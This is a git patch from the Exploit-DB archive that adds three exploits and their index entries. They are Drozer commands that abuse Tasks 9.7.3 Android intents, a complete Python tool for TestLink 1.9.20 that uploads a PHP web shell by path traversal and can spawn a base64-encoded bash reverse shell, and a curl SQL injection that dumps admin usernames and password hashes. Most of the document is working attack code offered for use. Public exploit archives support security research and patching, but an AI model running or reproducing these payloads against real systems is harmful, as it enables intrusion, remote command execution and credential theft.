From bedbb144ab42330d1272a6481c3c2258548dd5c1 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 16 Feb 2021 05:01:53 +0000 Subject: [PATCH] DB: 2021-02-16 3 changes to exploits/shellcodes Tasks 9.7.3 - Insecure Permissions TestLink 1.9.20 - Unrestricted File Upload (Authenticated) Teachers Record Management System 1.0 - 'searchteacher' SQL Injection --- exploits/android/local/49563.txt | 20 ++++ exploits/php/webapps/49561.py | 200 +++++++++++++++++++++++++++++++ exploits/php/webapps/49562.sh | 31 +++++ files_exploits.csv | 3 + 4 files changed, 254 insertions(+) create mode 100644 exploits/android/local/49563.txt create mode 100755 exploits/php/webapps/49561.py create mode 100755 exploits/php/webapps/49562.sh diff --git a/exploits/android/local/49563.txt b/exploits/android/local/49563.txt new file mode 100644 index 000000000..1745e9545 --- /dev/null +++ b/exploits/android/local/49563.txt @@ -0,0 +1,20 @@ +# Exploit Title: Tasks 9.7.3 - Insecure Permissions +# Date: 18th of July, 2020 +# Exploit Author: Lyhin's Lab +# Detailed Bug Description: https://lyhinslab.org/index.php/2020/07/18/how-the-white-box-hacking-works-ok-google-i-wanna-pwn-this-app/ +# Vendor Homepage: https://tasks.org/ +# Software Link: https://github.com/tasks/tasks +# Version: 9.7.3 +# Tested on: Android 9 + +Any installed application on a victim's phone can add arbitrary tasks to users through insecure IPC handling. +A malicious application has several ways of how to achieve that: + +1. By sending multiple intents to ShareLink activity (com/todoroo/astrid/activity/ShareLinkActivity.java). Tasks application adds the first requested "task" to the user's task list. + +2. By sending an intent to VoiceCommand activity (org/tasks/voice/VoiceCommandActivity.java). The application does not validate intent's origin, so any application can append tasks to the user's task list. + +We used the Drozer application to emulate malicious app activity. Please find the commands below. + +run app.activity.start --component org.tasks.debug com.todoroo.astrid.activity.ShareLinkActivity --action=android.intent.action.PROCESS_TEXT --extra string android.intent.extra.PROCESS_TEXT "Kill Mufasa" +run app.activity.start --component org.tasks.debug org.tasks.voice.VoiceCommandActivity --action=com.google.android.gm.action.AUTO_SEND --extra string android.intent.extra.TEXT "Visit https://lyhinslab.org" \ No newline at end of file diff --git a/exploits/php/webapps/49561.py b/exploits/php/webapps/49561.py new file mode 100755 index 000000000..fc8932227 --- /dev/null +++ b/exploits/php/webapps/49561.py @@ -0,0 +1,200 @@ +# Exploit Title: TestLink 1.9.20 - Unrestricted File Upload (Authenticated) +# Date: 14th February 2021 +# Exploit Author: snovvcrash +# Original Research by: Ackcent AppSec Team +# Original Research: https://ackcent.com/testlink-1-9-20-unrestricted-file-upload-and-sql-injection/ +# Vendor Homepage: https://testlink.org/ +# Software Link: https://github.com/TestLinkOpenSourceTRMS/testlink-code +# Version: 1.9.20 +# Tested on: Ubuntu 20.10 +# CVE: CVE-2020-8639 +# Requirements: pip3 install -U requests bs4 +# Usage Example: ./exploit.py -u admin -p admin -P 127.0.0.1:8080 http://127.0.0.1/testlink + +""" +Raw exploit request: + +POST /testlink/lib/keywords/keywordsImport.php HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=---------------------------242818621515179709592867995067 +Content-Length: 1187 +Origin: http://127.0.0.1 +Connection: close +Referer: http://127.0.0.1/testlink//lib/keywords/keywordsImport.php?tproject_id=1 +Cookie: PHPSESSID=kvbpl3t3lec42qbjdcgdppncib; TESTLINK1920TESTLINK_USER_AUTH_COOKIE=af57ebce9f54ce0f0e36d24ef25dc9c1b3a9d2f8e0b9cb4454c973927306e90f +Upgrade-Insecure-Requests: 1 + +-----------------------------242818621515179709592867995067 +Content-Disposition: form-data; name="CSRFName" + +CSRFGuard_1115715115 +-----------------------------242818621515179709592867995067 +Content-Disposition: form-data; name="CSRFToken" + +506c4b44825c5e5885231c263e7195188dedbd154b9cf74e5d183c1feb953aec7c0edae1097649d82acd20f6f851e0cdbac91cc0589d1cfd6fb13741f9cf0cb8 +-----------------------------242818621515179709592867995067 +Content-Disposition: form-data; name="importType" + +/../../../logs/pwn.php +-----------------------------242818621515179709592867995067 +Content-Disposition: form-data; name="MAX_FILE_SIZE" + +409600 +-----------------------------242818621515179709592867995067 +Content-Disposition: form-data; name="uploadedFile"; filename="foo.xml" +Content-Type: application/xml + +&1' );} ?> +-----------------------------242818621515179709592867995067 +Content-Disposition: form-data; name="tproject_id" + +1 +-----------------------------242818621515179709592867995067 +Content-Disposition: form-data; name="UploadFile" + +Upload file +-----------------------------242818621515179709592867995067-- +""" + +#!/usr/bin/env python3 + +import re +from urllib import parse +from cmd import Cmd +from base64 import b64encode +from argparse import ArgumentParser + +import requests +from bs4 import BeautifulSoup + +parser = ArgumentParser() +parser.add_argument('target', help='target full URL without trailing slash, ex. "http://127.0.0.1/testlink"') +parser.add_argument('-u', '--username', default='admin', help='TestLink username') +parser.add_argument('-p', '--password', default='admin', help='TestLink password') +parser.add_argument('-P', '--proxy', default=None, help='HTTP proxy in format , ex. "127.0.0.1:8080"') +args = parser.parse_args() + + +class TestLinkWebShell(Cmd): + + payloadPHP = """&1' );} ?>""" + uploadPath = 'logs/pwn.php' + prompt = '$ ' + + def __init__(self, target, username, password, proxies): + super().__init__() + + self.target = target + self.username = username + self.password = password + + if proxies: + self.proxies = {'http': f'http://{proxies}', 'https': f'http://{proxies}'} + else: + self.proxies = None + + self.session = requests.Session() + self.session.verify = False + + resp = self.session.get(f'{self.target}/login.php', proxies=self.proxies) + soup = BeautifulSoup(resp.text, 'html.parser') + + self.csrf_name = soup.find('input', {'name': 'CSRFName'}).get('value') + self.csrf_token = soup.find('input', {'name': 'CSRFToken'}).get('value') + self.req_uri = soup.find('input', {'name': 'reqURI'}).get('value') + self.destination = soup.find('input', {'name': 'destination'}).get('value') + + def auth(self): + data = { + 'CSRFName': self.csrf_name, + 'CSRFToken': self.csrf_token, + 'reqURI': self.req_uri, + 'destination': self.destination, + 'tl_login': self.username, + 'tl_password': self.password + } + + resp = self.session.post(f'{self.target}/login.php?viewer=', data=data, proxies=self.proxies) + if resp.status_code == 200: + print('[*] Authentication succeeded') + + resp = self.session.get(f'{self.target}/lib/general/mainPage.php', proxies=self.proxies) + if resp.status_code == 200: + print('[*] Loaded mainPage.php iframe contents') + soup = BeautifulSoup(resp.text, 'html.parser') + + self.tproject_id = soup.find('a', {'href': re.compile(r'lib/keywords/keywordsView.php\?')}).get('href') + self.tproject_id = parse.parse_qs(parse.urlsplit(self.tproject_id).query)['tproject_id'][0] + + print(f'[+] Extracted tproject_id value: {self.tproject_id}') + + else: + raise Exception('Error loading mainPage.php iframe contents') + + else: + raise Exception('Authentication failed') + + def upload_web_shell(self): + files = [ + ('CSRFName', (None, self.csrf_name)), + ('CSRFToken', (None, self.csrf_token)), + ('importType', (None, f'/../../../{TestLinkWebShell.uploadPath}')), + ('MAX_FILE_SIZE', (None, '409600')), + ('uploadedFile', ('foo.xml', TestLinkWebShell.payloadPHP)), + ('tproject_id', (None, self.tproject_id)), + ('UploadFile', (None, 'Upload file')) + ] + + resp = self.session.post(f'{self.target}/lib/keywords/keywordsImport.php', files=files, proxies=self.proxies) + if resp.status_code == 200: + print(f'[*] Web shell uploaded here: {self.target}/{TestLinkWebShell.uploadPath}') + + print('[*] Trying to query whoami...') + resp = self.session.get(f'{self.target}/{TestLinkWebShell.uploadPath}?c=whoami', proxies=self.proxies) + if resp.status_code == 200: + print(f'[+] Success! Starting semi-interactive shell as {resp.text.strip()}') + + else: + raise Exception('Error interacting with the web shell') + + else: + raise Exception('Error uploading web shell') + + def emptyline(self): + pass + + def preloop(self): + self.auth() + self.upload_web_shell() + + def default(self, args): + try: + resp = self.session.get(f'{self.target}/{TestLinkWebShell.uploadPath}?c={args}', proxies=self.proxies) + if resp.status_code == 200: + print(resp.text.strip()) + except Exception as e: + print(f'*** Something weired happened: {e}') + + def do_spawn(self, args): + """Spawn a reverse shell. Usage: \"spawn \".""" + try: + lhost, lport = args.split() + payload = f'/bin/bash -i >& /dev/tcp/{lhost}/{lport} 0>&1' + b64_payload = b64encode(payload.encode()).decode() + cmd = f'echo {b64_payload} | base64 -d | /bin/bash' + self.default(cmd) + except Exception as e: + print(f'*** Something weired happened: {e}') + + def do_EOF(self, args): + """Use Ctrl-D to exit the shell.""" + print(); return True + + +if __name__ == '__main__': + tlws = TestLinkWebShell(args.target, args.username, args.password, args.proxy) + tlws.cmdloop('Type help for list of commands') \ No newline at end of file diff --git a/exploits/php/webapps/49562.sh b/exploits/php/webapps/49562.sh new file mode 100755 index 000000000..1f0d89b45 --- /dev/null +++ b/exploits/php/webapps/49562.sh @@ -0,0 +1,31 @@ +# Exploit Title: Teachers Record Management System 1.0 - 'searchteacher' SQL Injection +# Date: 13/02/2021 +# Exploit Author: Soham Bakore, Nakul Ratti +# Vendor Homepage: https://www.sourcecodester.com/ +# Software Link: https://www.sourcecodester.com/php/14399/teacher-record-system-phpmysql.html +# Version:1.0 +# Tested on: latest version of Chrome, Firefox on Windows and Linux + +--------------------------Proof of Concept----------------------- + +1. Navigate to http://host/trms/ +2. The "searchteacher" parameter in search-teacher.php is vulnerable to SQL +injection +3. Below curl request will display the admin username and password hash + +------------------------Exploit request----------------------------- + +curl -i -s -k -X $'POST' \ + -H $'Host: 192.168.1.13' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; +Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0' -H $'Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' +-H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' +-H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: +130' -H $'Origin: http://192.168.1.17' -H $'DNT: 1' -H $'Connection: close' +-H $'Referer: http://192.168.1.13/trms/' -H $'Cookie: +PHPSESSID=t2lshgnjhov62o1s0q0iq331p9' -H $'Upgrade-Insecure-Requests: 1' \ + -b $'PHPSESSID=t2lshgnjhov62o1s0q0iq331p9' \ + --data-binary +$'searchteacher=Arts\'+union+select+1,concat(\'Username:\',UserName),3,concat(\'Password:\',Password),5,6,7,8,9,10+from+tbladmin#&search=' +\ + $'http://host/trms/search-teacher.php' \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 8a358c782..a82540083 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11262,6 +11262,7 @@ id,file,description,date,author,type,platform,port 49541,exploits/windows/local/49541.html,"Microsoft Internet Explorer 11 32-bit - Use-After-Free",2021-02-08,"Forrest Orr",local,windows, 49548,exploits/windows/local/49548.txt,"Epson USB Display 1.6.0.0 - 'EMP_UDSA' Unquote Service Path",2021-02-09,"Hector Gerbacio",local,windows, 49549,exploits/windows/local/49549.txt,"AnyTXT Searcher 1.2.394 - 'ATService' Unquoted Service Path",2021-02-09,"Mohammed Alshehri",local,windows, +49563,exploits/android/local/49563.txt,"Tasks 9.7.3 - Insecure Permissions",2021-02-15,"Lyhin\'s Lab",local,android, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -43531,6 +43532,7 @@ id,file,description,date,author,type,platform,port 49262,exploits/hardware/webapps/49262.py,"Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2)",2020-12-15,Freakyclown,webapps,hardware, 49559,exploits/php/webapps/49559.txt,"School File Management System 1.0 - 'multiple' Stored Cross-Site Scripting",2021-02-12,"Pintu Solanki",webapps,php, 49560,exploits/php/webapps/49560.txt,"School Event Attendance Monitoring System 1.0 - 'Item Name' Stored Cross-Site Scripting",2021-02-12,"Suresh Kumar",webapps,php, +49561,exploits/php/webapps/49561.py,"TestLink 1.9.20 - Unrestricted File Upload (Authenticated)",2021-02-15,snovvcrash,webapps,php, 49264,exploits/php/webapps/49264.txt,"Grav CMS 1.6.30 Admin Plugin 1.9.18 - 'Page Title' Persistent Cross-Site Scripting",2020-12-16,"Sagar Banwa",webapps,php, 49265,exploits/linux/webapps/49265.txt,"Raysync 3.3.3.8 - RCE",2020-12-16,james,webapps,linux, 49266,exploits/android/webapps/49266.py,"Magic Home Pro 1.5.1 - Authentication Bypass",2020-12-16,"Victor Hanna",webapps,android, @@ -43749,3 +43751,4 @@ id,file,description,date,author,type,platform,port 49555,exploits/php/webapps/49555.txt,"b2evolution 6.11.6 - 'tab3' Reflected XSS",2021-02-11,"Nakul Ratti",webapps,php, 49556,exploits/multiple/webapps/49556.py,"Openlitespeed WebServer 1.7.8 - Command Injection (Authenticated) (2)",2021-02-11,"Metin Yunus Kandemir",webapps,multiple, 49557,exploits/php/webapps/49557.py,"Online Marriage Registration System (OMRS) 1.0 - Remote code execution (3)",2021-02-11,"Ricardo Ruiz",webapps,php, +49562,exploits/php/webapps/49562.sh,"Teachers Record Management System 1.0 - 'searchteacher' SQL Injection",2021-02-15,"Soham Bakore",webapps,php,